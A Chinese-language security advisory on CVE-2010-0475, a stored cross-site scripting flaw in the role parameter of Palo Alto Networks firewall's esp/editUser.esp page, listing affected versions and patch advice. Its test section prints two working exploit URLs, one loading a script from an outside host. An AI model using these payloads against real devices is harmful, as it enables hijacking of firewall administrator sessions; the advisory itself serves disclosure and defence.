Palo Alto Networks防火墙esp/editUser.esp页面存储式跨站脚本漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-05-19

影响版本:
Palo Alto Networks firewall 3.1.x
Palo Alto Networks firewall 3.0.x

漏洞描述:
BUGTRAQ  ID: 40113
CVE(CAN) ID: CVE-2010-0475

Palo Alto Networks是新一代的硬件防火墙设备。

Palo Alto Networks防火墙的esp/editUser.esp页面没有正确地过滤用户在URL请求中所提供的role参数,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器中执行任意HTML和脚本代码。

<*参考
http://marc.info/?l=bugtraq&m=127369148522786&w=2
*>

测试方法:
https://www.syue.com:443/esp/editUser.esp?mode=edit&amp;origusername=test&amp;deviceC=localhost.localdomain&amp;vsysC=localhost.localdomain%2Fvsys1&amp;vsys=&amp;profile=&amp;cfgchange=&amp;opasswd=&amp;tpasswd=********&amp;cpasswd=********&amp;role=vsysadmin&lt;SCRIPT&gt;alert(&quot;0wn3d&quot;)&lt;/SCRIPT&gt;  &amp;admin-role=%5Bobject+Object%5D&amp;bSubmit=O

https://www.syue.com:443/esp/editUser.esp?mode=edit&amp;origusername=test&amp;deviceC=localhost.localdomain&amp;vsysC=localhost.localdomain%2Fvsys1&amp;vsys=&amp;profile=&amp;cfgchange=&amp;opasswd=&amp;tpasswd=********&amp;cpasswd=********&amp;role=vsysadmin&lt;SCRIPT/XSS src=&quot;/http://www.jeromiejackson.com/tryme.js&quot;&gt;&lt;/SCRIPT&gt;&amp;admin-role=%5Bobject+Object%5D&amp;bSubmit=O

安全建议:
厂商补丁:

Palo Alto Networks
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.paloaltonetworks.com

图片内容